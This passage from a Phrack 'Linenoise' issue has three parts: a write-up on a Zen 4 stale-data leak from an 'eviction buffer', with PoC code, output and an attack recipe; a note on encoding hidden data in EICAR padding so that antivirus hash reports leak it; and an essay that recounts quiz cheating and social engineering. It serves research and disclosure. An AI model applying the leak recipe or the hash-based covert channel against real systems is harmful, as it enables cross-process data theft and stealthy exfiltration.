.:: Phrack Magazine ::.

Current issue : #72 | Release date : 2025-08-19 | Editor : Phrack Staff

Title : Linenoise

Author : Phrack Staff

                           ==Phrack Inc.==

              Volume 0x10, Issue 0x48, Phile #0x03 of 0x12

|=-----------------------------------------------------------------------=|
|=---------------------=[ L I N E N O I S E ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|
|=-----------------------------------------------------------------------=|

    Linenoise is a collection of artifacts that do not fit elsewhere.
    Short papers, corrections, brain dumps, late papers, etc..... :))

Contents

1 - Barbie Sparkles – Barbie

2 - Another use for the EICAR test file – Peter Ferrie

3 - Hacker: Apotheosis of the Marginalized – Kolloid

4 - A Hacker’s Introduction To CHERI – xcellerator

5 - High-Performance Network Scanning With AF_XDP – c3l3si4n

6 - MMIO in the Middle – b1ack0wl

7 - Shell Your Way to Network Mastery – Gabriel & Thomas

8 - Breaking ToaruOS – NOT / Firzen, Binary Gecko



|=-----------------------------------------------------------------------=|
|=-------------------=[     1 - Barbie Sparkles     ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ barbie ]=-------------------------------=|
|=--------------------=[ [email protected] ]=----------------------=|
|=-----------------------------------------------------------------------=|


--[ 0 - Introduction

For a long time, data held in microarchitectural buffer-like structures was
believed to be strictly internal to the CPU and protected by architectural
mechanisms built into modern CPUs, many of them lacking detailed public
documentation. Since 2018, following the Microarchitectural Data Sampling
(MDS) attacks [1], the security community has discovered that the contents
of such buffers might be inferred or even, under the right circumstances,
directly leaked, e.g. by using a faulting load instruction or in the shadow
of transiently executed flows. These techniques might allow attackers to
bypass such architectural mechanisms and other hardware mitigations, e.g.
buffer clearing or overwriting.

Many such microarchitectural buffers have been publicly documented by now,
and most CPU vendors have deployed mitigations on newer hardware with this
new threat model in place. Unfortunately, we show that not all CPU vendors
have adopted this new threat vector into their threat model, and some newer
architectures are being released with such dangerous behaviors documented.

In this article, we show that it is possible to observe stale data from
previously evicted cache entries held in an undocumented microarchitectural
buffer, which we call the eviction buffer. More specifically, AMD Zen 4
platforms might enable a malicious process to observe data that was
previously evicted from a victim process, even if that victim process has
already terminated.

Moreover, unlike most prior data inference attacks on microarchitectural
buffers, this behavior has been documented in the official “AMD Zen4
Microarchitecture Documentation”, and AMD does not consider it a security
concern.


--[ 1 - Background
--[ 1.1 - Memory Types and Performance Optimizations

Modern CPUs support multiple memory types that are configurable by the OS 
and might be configurable by the VMM. These types enforce the cache policy 
used. There are cacheable memory types like write-back (WB), write-through 
(WT), and write-protect (WP), and uncacheable memory types like uncacheable 
(UC) and write-combining (WC).

The standard pages created by the OS for userland applications are WB,
which allows values to be cached and written back to memory when there is
bandwidth for it and the memory in question is not being actively used and
updated.

--[ 1.2 - Write-Combining

Write-Combining (WC) is a memory performance optimization technique, which 
allows for the combination of multiple write operations into a single 
transaction, which can then be written to memory in a more efficient 
manner, reducing the number of bus requests required for the write 
operations. 

For this, the CPU keeps the modified data of all store operations to a 
specific cache line in an internal buffer, until the data can be committed 
to the memory. Then, the data is flushed from the buffer and committed to 
external memory.
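
As a rough illustration of why combining helps, the toy model below counts
bus transactions for a sequence of stores, with and without combining. It
is a simplification for illustration only, not a description of how any
real CPU implements its buffers: it assumes a single buffer, 64-byte lines,
and a flush whenever a store touches a different line. The function name
countBusTransactions is made up for this sketch.

```javascript
// Toy model: ONE write-combining buffer that holds ONE 64-byte line.
// Real hardware has several buffers and more flush conditions.
const LINE_BYTES = 64; // assumption: 64-byte cache lines

function countBusTransactions(storeAddresses, combine) {
  // Without combining, every store becomes its own bus request.
  if (!combine) return storeAddresses.length;

  let transactions = 0;
  let openLine = null; // line currently collected in the buffer
  for (const addr of storeAddresses) {
    const line = Math.floor(addr / LINE_BYTES);
    if (line !== openLine) {
      // A store to a different line flushes the buffered one first.
      if (openLine !== null) transactions++;
      openLine = line;
    }
  }
  // Whatever is still buffered at the end is flushed once.
  if (openLine !== null) transactions++;
  return transactions;
}
```

For six stores spread over two lines, e.g. [0, 8, 16, 24, 64, 72], the
model reports 2 transactions with combining and 6 without.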

We also note that the __Software Optimization Guide for the AMD Zen4
Microarchitecture (ver. 57647, from January 2023)__ describes, in section
2.13.3 (Write Combine Buffers), the performance improvements made using
their aggressively combined write buffers.

--[ 1.3 - Microarchitectural Buffers

Many different microarchitectural structures are used in modern CPUs to
store data in transit. Many of these structures have been publicly
documented, and some of them have even been reverse engineered. At the same
time, several prior works explore the leakage or inference of data from
internal CPU buffers, including Fallout [2], ZombieLoad [3], and RIDL [4].
Each of these attacks targets a different buffer, e.g. store buffers, load
buffers, and fill buffers.

Since the security community identified such behaviors, mitigations have
been deployed on newer hardware with the understanding that such buffers
should also be treated as containing assets in the threat model.

In this work, we have identified an undocumented microarchitectural buffer
that seems to handle previously evicted cache entries when such entries
have been tagged as belonging to uncacheable memory. We call this
undocumented microarchitectural structure the _eviction buffer_.


--[ 2 - barbieSparkles

At a high level, barbieSparkles may load data from unintended evicted cache
entries held in the eviction buffer after we change the memory type to WC.
We observed this behavior crossing context boundaries: across threads,
across cores, and even between VM host and guest.

--[ 2.1 - Eviction Sets

A precondition for barbieSparkles is that the attacker is able to evict
cache entries from the victim process. There is extensive research in this
area, ranging from reverse engineering cache sets to more brute-force
approaches.

--[ 2.2 - Memory Type Change

Normally, only OS and VMM software have permission to change the memory
type of a specific page. For our proof-of-concept, we use the PTEditor
library [5]. PTEditor enables modifying page-table levels, changing memory
types, and performing other memory manipulation actions through user-level
APIs provided by a Linux kernel module.

--[ 2.3 - First Sparkle

Our first sighting of a sparkle occurred by chance, and it was unexpected.
We wanted to check whether we could modify the memory type of cacheable
memory and validate a cache poisoning behavior. There are many reasons why
a modern CPU invalidates and poisons cache lines. And if one is playing
with memory types, why not also check the uncacheable ones? And there it
was, when changing the memory type of a process from a cacheable one to WC.
After first spotting it, we began our research by implementing various
tests that could give us some insight into what was happening and why. The
first test was not perfect:

// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;


We could see some sparkle, but it wasn't clear where and why:

(...)
result targetsrc val: 0x0, access time: 1440
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 675 // the stale value
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42, access time: 495 // the secret value
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 1485
result targetsrc val: 0x0, access time: 540
(...)


So, we went for more statistical testing. Running the code 100 times in a
loop of 512 iterations, we would get a one- to two-digit number of hits on
the secret. This isn't enough though. If we can see data that isn't
supposed to be there, then we want to see it all the time, right?
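
One way to put numbers on such runs is to tally the values in the
"result targetsrc val" lines. The sketch below is not part of the original
tooling; the helper names tallyValues and hitRate are invented here, and
the only thing it assumes is the output format shown above.

```javascript
// Count how often each value appears in lines such as
//   result targetsrc val: 0x33333333, access time: 675
function tallyValues(output) {
  const counts = new Map();
  const pattern = /^result targetsrc val: (0x[0-9a-f]+), access time: \d+/gm;
  for (const match of output.matchAll(pattern)) {
    counts.set(match[1], (counts.get(match[1]) || 0) + 1);
  }
  return counts;
}

// Fraction of all result lines that carried the given value.
function hitRate(counts, value) {
  let total = 0;
  for (const n of counts.values()) total += n;
  return total === 0 ? 0 : (counts.get(value) || 0) / total;
}
```

Feeding it the captured output and asking for hitRate(counts, "0x42")
gives the share of reads that returned the secret.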

--[ 2.4 - I See Sparkles EVERYWHERE

From there, we started to check different contexts, trying to figure out
where the leakage was coming from. We decided to test if we could leak
across sibling threads on a hyperthreaded system.

Check the pairs:

$ cat /sys/devices/system/cpu/cpu*/topology/thread_siblings_list
0,8
2,10
3,11
4,12
5,13
6,14
7,15
1,9


And we test two siblings:

$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 1440
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
(...)
$ ./barbiesparkles -c 10 -s 41414141 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 630
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x8, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
(...)


This shows that whatever buffer we are leaking from, it is shared within 
the core at least. Next step, can we leak cross-core?

$ ./barbiesparkles -c 2 -s 43434343 -n 512 -I 100 &>/dev/null
$ ./barbiesparkles -c 3 -s 44444444 -n 512 -I 100 | grep result
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 585
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 495
(...)


Huh, so our buffer is shared across all cores? Nice! We also observe that
we still have some hits for the value we store in the targetsrc
(0x33333333), albeit at a lower hit rate than the secret value. To force
the architectural value to be committed, we flush the cache before we
change the memory type:

// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);

// Evict the cache
flush(buf_targetsrc);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;


With that, we now have actual 100% hits on the architectural (0x33) value. This 
seems deterministic enough to me.

$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 540
(...)


But remember that we were reading the data AFTER changing the memory type 
to WC, which assumes that the data shouldn't be present in the cache 
anymore. Just to be sure that we are seeing the current architectural value 
of targetsrc, we overwrite it with 0x11 and re-run the tests:

// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);

// Evict the cache
flush(buf_targetsrc);

// Overwrite buffer with a dummy value
memset(buf_targetsrc, 0x11);

// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;


... and nope. What we are seeing isn't the architectural value - it is the 
evicted stale value:

$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x33333333 | wc -l
100


And again, 100% of the hits. Even if we flush the targetsrc buffer (with
value 0x33) and overwrite it with the new value (0x11) we still get 100%
hits on the value 0x33. We have stale data in place!

To confirm that we are seeing only evicted data, we flush it right after 
overwriting it with 0x11 or after changing the memory type (it doesn't seem 
to matter at all) and re-run the test:

$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x11111111 | wc -l
100


--[ 2.5 - Finding The Sparkles Source

We started with the obvious tests. For example, we mapped the secret buffer
pages to the same physical page, and that gave us zero, nada hits,
confirming that this wasn’t leaking due to a stale TLB entry. After tons of
such tests, we realized we don’t actually know the microarchitectural
structure where the leak is coming from, so we started calling it the
“eviction buffer”.

To leak the stale data, there must be a full physical address tag hit on
the eviction buffer. We wrote a PoC for this behavior by tracking the
physical memory address throughout the tests and then matching the secret
addresses with their respective tags.

To get the physical address, we used PTEditor's built-in function
ptedit_pte_get_pfn, which returns, as you might expect, the page-frame
number.
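
Turning a page-frame number into a full physical address is plain
arithmetic. The sketch below shows it under two assumptions that are not
stated in the text: 4 KiB pages and 64-byte cache lines. The helper names
are invented for illustration, and the PFN is passed in as a plain number
rather than read through PTEditor.

```javascript
const PAGE_SHIFT = 12n; // assumption: 4 KiB pages
const LINE_SIZE = 64n;  // assumption: 64-byte cache lines

// Physical address = page-frame number shifted up, plus the offset of
// the virtual address inside its page.
function physicalAddress(pfn, virtualAddress) {
  const offset = BigInt(virtualAddress) & ((1n << PAGE_SHIFT) - 1n);
  return (BigInt(pfn) << PAGE_SHIFT) | offset;
}

// Address of the cache line containing a physical address.
function cacheLineAddress(physAddr) {
  return physAddr & ~(LINE_SIZE - 1n);
}
```

Two buffers whose addresses map to the same cacheLineAddress are
candidates for the tag match described above.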


--[ 3 - Sparkle PoC Recipe

If you want to see your Zen4 platform sparkling for yourself:

1.  Create two processes – one is the victim, one is the attacker. 

    a.  The victim allocates a memory buffer and writes a secret value to 
    it. 
    Then, the victim overwrites the secret in memory, frees the allocated 
    buffer, and exits (yeap, the process doesn’t need to be running)!

    b.  The attacker allocates memory in order to reclaim the same physical 
    pages previously used by the victim to write the secret. You can choose 
    your own version for this – allocating tons of memory is legit :)

2.  The attacker marks the reclaimed memory as WC and flushes the TLB 
(making sure that the TLB entry is up-to-date).

3.  The attacker reads the memory and gets the secret – all sparkling!

Serving options:

    - Overwrite the secret in the victim and terminate the victim 
    process: 
        The attacker is able to leak the secret even if the secret value 
        was previously overwritten architecturally. 
    - Run the victim and the attacker processes in the same core (sibling 
    threads), in any neighboring core (in the same CPU), or leak between 
    host and guest virtual machine.
    - Try it out mixing and matching domains, e.g., VM host and guest


--[ 4 - Reading the Funny Manual

It is important to note before we let you go that the __AMD64 Architecture
Programmer's Manual Volume 2: System Programming__
(https://www.amd.com/system/files/TechDocs/24593.pdf) actually documents
that we should not play and switch between cache policies of a specific
physical page, quoting:

7.8.7 Changing Memory Type
A physical page should not have differing cacheability types assigned to it
through different virtual mappings; they should be either all of a
cacheable type (WB, WT, WP) or all of a non-cacheable type (UC, WC).

Otherwise, this may result in a loss of cache coherency, leading to stale
data and unpredictable behavior.


So, please, all of you behave and follow the manual – otherwise, there will
be sparkles.

--[ 5 - References

[1] Intel Corp. (2021-03-11). "Microarchitectural Data Sampling."
[2] Minkin, Marina; Moghimi, Daniel; Lipp, Moritz; Schwarz, Michael; Van 
Bulck, Jo; Genkin, Daniel; Gruss, Daniel; Piessens, Frank; Sunar, Berk; 
Yarom, Yuval (2019-05-14). "Fallout: Reading Kernel Writes From User Space"
[3] Schwarz, Michael; Lipp, Moritz; Moghimi, Daniel; Van Bulck, Jo; 
Stecklina, Julian; Prescher, Thomas; Gruss, Daniel (2019-05-14). 
"ZombieLoad: Cross-Privilege-Boundary Data Sampling"
[4] van Schaik, Stephan; Milburn, Alyssa; Österlund, Sebastian; Frigo, 
Pietro; Maisuradze, Giorgi; Razavi, Kaveh; Bos, Herbert; Giuffrida, 
Cristiano (2019-05-14). "RIDL: Rogue In-Flight Data Load"
[5] Michael Schwarz. PTEditor. https://github.com/misc0110/PTEditor


|=-----------------------------------------------------------------------=|
|=------------=[ 2 - Another use for the EICAR test file ]=--------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ Peter Ferrie (qkumba) ]=-----------------------=|
|=-----------------------------------------------------------------------=|

    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The EICAR test string, right?

    68 bytes
    CRC32 6851cf3c
    MD5 44d88612fea8a8f36de82e1278abb02f
    SHA256 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f

Right? Right??

No.

It's actually

    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

followed by up to 60 bytes of restricted white-space characters. The allowed
white-space characters are

    Space
    Ctrl-Z
    Tab
    CR
    LF

So?

What if...

    Space = 0b, Ctrl-Z = 1b, 60 bits per file, 7.5 bytes

EICAR is now a steganography vehicle
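
A minimal sketch of the one-bit-per-character idea, assuming the bits
arrive as a string of "0" and "1". The names hideBits and recoverBits are
made up for illustration.

```javascript
const EICAR =
  "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
const MAX_PADDING = 60; // padding limit stated above

// Append one whitespace character per bit: Space = 0, Ctrl-Z = 1.
function hideBits(bits) {
  if (!/^[01]*$/.test(bits)) throw new Error("bits must contain only 0 and 1");
  if (bits.length > MAX_PADDING) throw new Error("at most 60 bits fit");
  let tail = "";
  for (const bit of bits) tail += bit === "1" ? "\x1a" : " ";
  return EICAR + tail;
}

// Read the bits back from everything after the 68-byte test string.
function recoverBits(file) {
  let bits = "";
  for (const ch of file.slice(EICAR.length)) bits += ch === "\x1a" ? "1" : "0";
  return bits;
}
```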

Maybe a bit fancier

    Space   %*1*00000
    Ctrl-Z  %0*1*1010
    Tab     %00*1*000
    CR      %001*1*01
    LF      %0010*1*0

All five characters have one bit in a unique position
Four bits in a nibble, decoder becomes simpler

60 bits is not enough?

    Space = 00b
    Ctrl-Z = 01b
    Tab = 10b
    CR = 11b

120 bits per file, 15 bytes
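
Sketched in code, assuming the four-symbol table above and bytes packed
most significant bit pair first (the bit order and the names packBytes and
unpackBytes are choices made for this example):

```javascript
// Index = two-bit value: 00 Space, 01 Ctrl-Z, 10 Tab, 11 CR
const PAIR_SYMBOLS = [" ", "\x1a", "\t", "\r"];

// Four padding characters per byte, so 15 bytes fill the 60 characters.
function packBytes(bytes) {
  if (bytes.length > 15) throw new Error("at most 15 bytes fit");
  let tail = "";
  for (const byte of bytes) {
    for (let shift = 6; shift >= 0; shift -= 2) {
      tail += PAIR_SYMBOLS[(byte >> shift) & 3];
    }
  }
  return tail;
}

function unpackBytes(tail) {
  const bytes = [];
  for (let i = 0; i + 4 <= tail.length; i += 4) {
    let byte = 0;
    for (const ch of tail.slice(i, i + 4)) {
      byte = (byte << 2) | PAIR_SYMBOLS.indexOf(ch);
    }
    bytes.push(byte);
  }
  return bytes;
}
```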

But wait!
There's more!

Any subset of the five characters can represent the zero bit
The rest can represent the one bit

EICAR as *OLIGOMORPHIC* steganography vehicle!

"hello world" (*)

    0D200A080D080A1A081A0A1A1A0A080D201A0D0808201A1A201A1A202020200A
    1A20200D201A1A2020080D1A08081A200A0A080D1A0A0D

    SHA256
    6a154634b1be7df212863e486b2b1d0cb842e72c3baef941b1054e50fc08b993

(*) 5-bit text-encoding, one special character; tab/cr/lf=0, space/ctrl-z=1

Or "hello world"

    08200A0D0A0D081A08200A1A1A0A0A0A20200D0D08201A1A201A201A201A2008
    1A1A1A0D2020201A20080820080A1A20080A0A0D20080D

    SHA256
    f982fa69f04053060d82aece78df2dbf10b2fcf86e842ffe44fbc287f4f4b92c

Or "hello world"

    0A200D0A0A0D0D1A0A1A0A1A1A080D0D20200A0D0D1A201A1A1A1A20201A1A0D
    202020081A1A201A1A0D08200D0D1A1A0D080A081A0D08

    SHA256
    09258537fe9ea0105831873c4fbe8d000e54491fdfe446d7d353544c7b4cf334

The encoder

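    function encode(text) {
      // one bits: space or Ctrl-Z (space listed twice to get 3 entries)
      const s = [" ", "\x1a", " "]
      // zero bits: tab, CR or LF
      const c = ["\t", "\r", "\n"]
      let t = ""
      for (let x = 0; x < text.length; x++) {
        // keep the low 5 bits; 0 (e.g. space) becomes the special value 31
        let q = text.charCodeAt(x) & 31
        if (!q) q = 31
        // emit 5 bits, most significant first, one random character each
        for (let b = 32; b >>= 1;)
          t += ((q & b) ? s : c)[Math.floor(Math.random() * 3)]
      }
      return t
    }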
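
The matching decoder is not given in the text. A possible sketch follows,
assuming the input is only the padding (everything after the 68-byte
string) and that the message was lowercase letters and spaces, since five
bits cannot carry more. The names decodePadding and hexToString are
invented here.

```javascript
// Rebuild the text from the padding, five characters per letter.
function decodePadding(padding) {
  let text = "";
  for (let i = 0; i + 5 <= padding.length; i += 5) {
    let q = 0;
    for (const ch of padding.slice(i, i + 5)) {
      // space and Ctrl-Z carry a one bit; any other character is a zero
      q = (q << 1) | (ch === " " || ch === "\x1a" ? 1 : 0);
    }
    // 31 is the special value standing in for the space character
    text += q === 31 ? " " : String.fromCharCode(96 + q);
  }
  return text;
}

// Helper to turn a hex dump like the ones above into a string.
function hexToString(hex) {
  return hex.replace(/../g, (pair) => String.fromCharCode(parseInt(pair, 16)));
}
```

Running decodePadding(hexToString(...)) on the first hex dump above gives
back "hello world".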


Multiple EICAR files mean more data
File naming can define data ordering

1. Create the files on disk
2. Trigger a scan
3. Detections will include the unique file hash

The *anti-malware engine* will leak the data
The files never have to leave the disk
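
Why the hash carries the data: every padding variant is a different file,
so it hashes differently. A small sketch using Node's built-in crypto
module (the choice of Node and the helper name sha256Hex are assumptions of
this example):

```javascript
const crypto = require("crypto");

const EICAR_BASE =
  "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";

// Hash the file content byte for byte (latin1 keeps one byte per char).
function sha256Hex(content) {
  return crypto.createHash("sha256").update(content, "latin1").digest("hex");
}

const plainHash = sha256Hex(EICAR_BASE);           // the bare 68-byte string
const spaceHash = sha256Hex(EICAR_BASE + " ");     // one hidden zero bit
const ctrlZHash = sha256Hex(EICAR_BASE + "\x1a");  // one hidden one bit

console.log(plainHash);
console.log(spaceHash);
console.log(ctrlZHash);
```

Whoever sees the detection report can match the reported hash against a
precomputed table of padding variants to recover the hidden bits.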

Noisy? Yes
But it only has to work once



|=-----------------------------------------------------------------------=|
|=-----------=[ 3 - Hacker: Apotheosis of the Marginalized ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Kolloid ]=------------------------------=|
|=-----------------------------------------------------------------------=|


--> 01: Introduction

Much like Phrack, I will soon be entering into my 40s.  I'm at that stage
where I'm reflecting on the rebelliousness of my youth, wondering what
it all meant.  Some of it brought financial gain, such as the time I found
a legitimate exploit that allowed me to win a Mercedes-Benz C-Class.
Some of it helped me along my career path, like when I used various social
engineering techniques to gain escalated privileges within a Fortune 500
company, enabling me to become a data scientist and submit a patent in
applied machine learning despite having no prior experience in the field.
Some of it led nowhere at all, like when I discovered a glitch in my stock
broker's trading platform that allowed me to borrow over $200K at a
negative interest rate until my account was promptly disabled when the
risk management team realized what I had done.  Although I fondly reminisce
on these events, it's not the outcomes that I find particularly meaningful.
Instead, it's what those acts reveal about myself that gives me the
greatest meaning: they show that I'm a hacker.

For the longest time, I was hesitant to call myself a hacker.  I felt
insecure in that identity because I wasn't using rootkits to gain access
into systems.  I didn't use Linux.  I didn't even have a compiler to make
executables.  Instead, I made simple tools from the resources available
to me (i.e., the default programs installed on Windows XP).  I mainly
worked out of Notepad in my early years, using JavaScript as my language
of choice.  I would do things like paste the decoded Base64 binaries of
cookies from two different accounts into two different instances of Notepad,
flipping back and forth like an animator flipping between pages to identify
bit changes.  Or I would use frames to pass credentials through the URL,
iterating with a script through an array on a timer to visually inspect five
frames at a time if any combination in my list would grant me access.  Since
I wasn't using a "real" programming language, I felt lesser, even though my
tools and techniques still enabled me to get what I was seeking and were
things made for myself.

Although I did not appreciate it at the time, my janky tools made in Notepad
represented the very essence of what made me a hacker.  In one form of
the definition, a hack is something roughly and hastily done. It is the
antithesis of something refined, so it is on the frontier, retaining some
uncivilized wildness to it.  On the frontier is where we find the hacker,
moving the boundaries of society by pushing the system beyond its intended
bounds, kicking and screaming all the way into new, unknown territory.
In that sense, the hacker is the modern-day embodiment of the mythological
trickster figure whose subversive acts keep society lively through the
amusement and chaos he brings.  I could not fully embrace my identity as
a hacker until I first understood the archetypal role the hacker represented
and the mythology I was living out.


          "The best way to describe trickster is to say simply 
          that the boundary is where he will be found--sometimes 
          drawing the line, sometimes crossing it, sometimes 
          erasing or moving it, but always there, the god of the 
          threshold in all its forms."

          - Lewis Hyde, Trickster Makes This World


--> 02: The Myth of Hermes

          "If my father will not give me honors, then I will steal 
          them."

          - Hermes

In "Trickster Makes This World," Lewis Hyde retells the story of Hermes, who
is the son of Zeus, king of the gods, and a cave nymph by means of an extra-
marital affair. His questionable birth makes it uncertain if he will become
recognized as a god as well. He was born with the stain of illegitimacy but
born undeniably exceptional, pointing to his divine ancestry, even if it
could not be explicitly stated aloud.  He was also born with a certain
impulsiveness, so he decides as a day-old baby to steal fifty head of cattle
from his half-brother Apollo, claiming that he was hungry for something
more substantial than the milk he was given.  In doing so, Hermes displays
his craftiness by walking the stolen cattle backward and by wearing special
sandals he crafted himself to obscure his footprints.  When he got back,
he slaughtered and cooked two of the cattle but did not eat the meat.
Instead, he hid it away and climbed back into his crib.

When Hermes' mother, Maia, discovers what he has done, she questions him by
asking how he could be so shameless to do such a thing.  Hermes first denies
the accusations by saying, "I am just a little baby.  How could I possibly
have stolen these cattle?"  Maia, who sees through her child's attempt at
deception, questions Hermes again, who laments in frustration, "Why must we
live in this cave when the other gods live on Olympus enjoying the fruits of
sacrifices?  If my father will not give me honors, then I will steal them."

Apollo eventually notices that some cattle from his herd are gone and also
somehow already knows that it was the newly-born Hermes that took them.
Apollo tracks down and questions Hermes, who once again responds with,
"I am just a little baby.  How could I possibly have stolen your cattle?"
Apollo threatens to throw baby Hermes into the depths of Tartarus if he does
not give him his cattle back, but Hermes does not relent to Apollo.  Since
neither would concede, Hermes declares that Zeus must judge who is right.
So Apollo drags Hermes up to Olympus to plead his case before their father,
telling Zeus of all the cunning details of Hermes' theft that he discovered.

For a third time, Hermes proclaims, "I am just a baby.  How could I possibly
have stolen those cattle?"  Zeus is amused at the audacity of the theft and
the steadfastness of Hermes' denial, even when caught.  So, Zeus begins to 
laugh.  Surely, this is the son of Zeus.  Rather than punishment, Zeus
orders Hermes to make amends with his brother and show him where the cattle
are hidden, revealing his tricks.  On their way to the hiding spot, Hermes
begins to play the lyre (which he also invented using the shell of a
tortoise he killed while on the way to steal the cattle), and Apollo becomes
enchanted by its sound, having never heard music before.  When they finally
reach the missing cattle, Hermes gives the lyre to Apollo as a gift.  In
return, Apollo gives the cattle to Hermes and a whip to symbolize his now
legitimate ownership of them, and the two become friends from that point
forward.

Hermes is a god of paradoxes, for he is a paradox as well.  How is it that
Hermes could be the illegitimate son of Zeus, the king of the gods?  How
could the most legitimate of all the gods produce anything illegitimate?
Just by existing, Hermes is a challenge to the order of Olympus, causing
trouble on his first day being born.  So he lies by saying, "I am just a
little baby," but it is a lie that forces others to acknowledge the truth
that he is more than just a little baby.  He begins to unwind his own
paradox. He lures others into engaging with it.  If he was just a baby, then
he could not have stolen those cattle.  If he was something more, then they
must admit that he should be elevated, deserving of praise instead of shame.
Somehow, through initially stealing those fifty head of cattle, Hermes
became recognized as being their rightful owner.  Coincidentally, he also
ended up on Olympus in the presence of his now delighted father, a place he
was never meant to be.  An illegitimate act set into motion the process of
being recognized as legitimate.  

Things worked out for Hermes, but one does not always receive honors, even
if the things of gods are successfully stolen.  Sometimes, the gods are not
amused.  Sometimes, you are thrown into Tartarus.


--> 03: Tartarus From My First Major Hack

When I was fifteen, I learned through my biology teacher about a website
that offered weekly prizes of up to $500 in gift certificates for winning
trivia quizzes.  After about two hours of repetition for each quiz, I became
fast enough to win by recognizing the questions and their answers by the
shape of the text and the first few words.  The purpose of the website was
to promote learning, but the quizzes ended up becoming just a reflex test.
I had to answer each question in a second or two, far below the amount of
time to even fully read the question. Regardless, I was able to win through
the intended means.  I could do what I was supposed to do.  However, it
wasn't sustainable because my vision would go blurry after a few hours of
intently staring at my CRT screen flickering at 60 Hz.  There had to be a
better way that didn't end with me going blind.

As I was lying in bed one evening, a thought came to me: Maybe I could
modify the cache file that contained the answers by overwriting the
individual characters within the file without changing the overall size of
the file.  I regularly went through the Temporary Internet Files folder
that held the cache for Internet Explorer, so I had already discovered the
file that contained the answers. Still, I was never able to successfully
run modified cache files before.  I wondered if there might be some internal
validation that checked if the file was the same size as when it was
initially downloaded before it ran in Offline Mode to ensure the file had
not been corrupted.  So, I got out of bed to give it a try, and this time
it finally worked!  I now had the ability to change websites (at least
how they interacted with me) in any way I saw fit, giving me something I
was never meant to have.

I would clear my cache, run the quiz once online to download the necessary
files, switch to Offline Mode, modify the cache file so that the answers
would always show up in the same location instead of a randomized one,
retake the quiz, and click on "Yes" when my browser would ask if I wanted to
